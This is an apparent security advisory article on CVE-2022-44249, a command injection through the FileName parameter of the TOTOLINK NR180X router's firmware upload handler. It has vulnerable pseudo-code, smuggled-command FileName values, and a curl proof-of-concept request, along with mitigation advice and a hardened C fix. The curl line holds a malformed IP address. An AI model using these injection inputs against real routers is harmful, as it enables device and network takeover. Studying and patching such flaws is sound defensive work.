The TOTOLINK NR180X is a popular WiFi-6 router, but in late 2022, security researchers discovered a critical vulnerability—CVE-2022-44249—that puts users at risk of remote code execution by unauthenticated attackers. This article breaks down the nature of the vulnerability and the simple but powerful attack method, includes proof-of-concept code, and offers mitigation advice. All in clear, simple language.
What Is CVE-2022-44249?
CVE-2022-44249 is a command injection vulnerability affecting the TOTOLINK NR180X running firmware version V9.1.u.6279_B20210910. The flaw lives in the part of the router’s web management interface that handles firmware updates. Specifically, the bug is in the UploadFirmwareFile function and how it handles the FileName parameter.
What’s the Big Deal?
- Anyone who can reach the router’s web interface, even over the local network, can exploit this bug.
How Does the Vulnerability Work?
When a user uploads new firmware via the web GUI, the NR180X backend calls UploadFirmwareFile, passing along whatever FileName value the user provides. The problem: this value ends up in a system command without proper sanitization.
Here is a pseudo-code example to illustrate:

    // Example pseudo-code
    #include <stdio.h>   // sprintf
    #include <stdlib.h>  // system

    void UploadFirmwareFile(char* FileName, ...) {
        char cmd[256];
        // Vulnerable: FileName is copied directly (no checks!)
        sprintf(cmd, "cp /tmp/upload/%s /tmp/fwupload/", FileName);
        system(cmd); // Command injection risk: cmd is interpreted by the shell
    }

If an attacker sends a FileName like firmware.bin;uname -a;, the command effectively becomes:

    cp /tmp/upload/firmware.bin;uname -a; /tmp/fwupload/

The router executes both cp ... and uname -a! An attacker could inject any Linux command.
Here’s how an attacker could exploit this via curl (or a simple POST request):

    curl -X POST \
      -F "FileName=firmware.bin;echo 'hacked' > /tmp/pwned;" \
      -F "FirmwareFile=@dummy_firmware.bin" \
      http://192.168..1/cgi-bin/UploadFirmwareFile

- This would create a file /tmp/pwned with the contents “hacked” on the router, proving that the exploit worked.
More malicious payloads can easily open a reverse shell, change router DNS settings, or brick the device.
Real-World Impact
- Network Takeover: The attacker can set up backdoors, sniff traffic, or redirect DNS for phishing.
How to Mitigate
1. Upgrade your firmware: TOTOLINK has released patches—always download the latest version for your model from the official TOTOLINK download page.
2. Restrict Web Interface: Only permit web access from trusted devices; disable WAN-side admin access.
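On the firmware side, the pattern in the pseudo-code above is fixed by validating FileName against an allowlist and copying the file without ever invoking a shell. The sketch below is an added example, not TOTOLINK's code or patch; the function names, the 64-character limit and the allowlist are assumptions, and the directory paths are taken from the pseudo-code.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Directories taken from the pseudo-code above; assumed, not vendor-confirmed. */
#define UPLOAD_DIR "/tmp/upload"
#define FW_DIR     "/tmp/fwupload"

/* Allowlist: 1..64 chars of [A-Za-z0-9._-], no leading dot, no "..".
 * Shell metacharacters, spaces, quotes and '/' all fail the check. */
int is_safe_filename(const char *name) {
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > 64 || name[0] == '.' || strstr(name, ".."))
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Build both paths with bounded formatting; -1 on bad name or truncation. */
int build_paths(const char *name, char *src, char *dst, size_t cap) {
    if (!is_safe_filename(name))
        return -1;
    int a = snprintf(src, cap, "%s/%s", UPLOAD_DIR, name);
    int b = snprintf(dst, cap, "%s/%s", FW_DIR, name);
    return (a < 0 || b < 0 || (size_t)a >= cap || (size_t)b >= cap) ? -1 : 0;
}

/* Copy with stdio instead of system("cp ..."): no shell ever sees the name.
 * Returns 0 on success, -1 rejected name, -2 open failure, -3 I/O error. */
int copy_firmware(const char *name) {
    char src[128], dst[128], buf[4096];
    size_t n; int rc = 0;
    if (build_paths(name, src, dst, sizeof src) != 0) return -1;
    FILE *in = fopen(src, "rb");
    if (!in) return -2;
    FILE *out = fopen(dst, "wb");
    if (!out) { fclose(in); return -2; }
    while ((n = fread(buf, 1, sizeof buf, in)) > 0)
        if (fwrite(buf, 1, n, out) != n) { rc = -3; break; }
    if (ferror(in)) rc = -3;
    fclose(in);
    if (fclose(out) != 0) rc = -3;
    return rc;
}
```

Both FileName values shown earlier in the article are rejected before any path is built, so the handler returns -1 without touching the filesystem.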
References and Learn More
- Official CVE entry for CVE-2022-44249
- TOTOLINK Official Download Page
- Exploit details - Seebug advisory (Chinese)
- Vulmon Security Center
Closing
CVE-2022-44249 is a perfect storm of “Easy to exploit” and “Total control”—it’s a textbook case proving why router firmware must never trust user input. If you own a TOTOLINK NR180X, take action now: update and secure your network. For security professionals, this is another reminder to always audit embedded system web interfaces for bad parameter handling—before the bad actors do!
*(Stay safe! If you have neighbors with TOTOLINK gear, send them this link—it’s an easy fix to a major problem.)*
Timeline
Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:41:00 UTC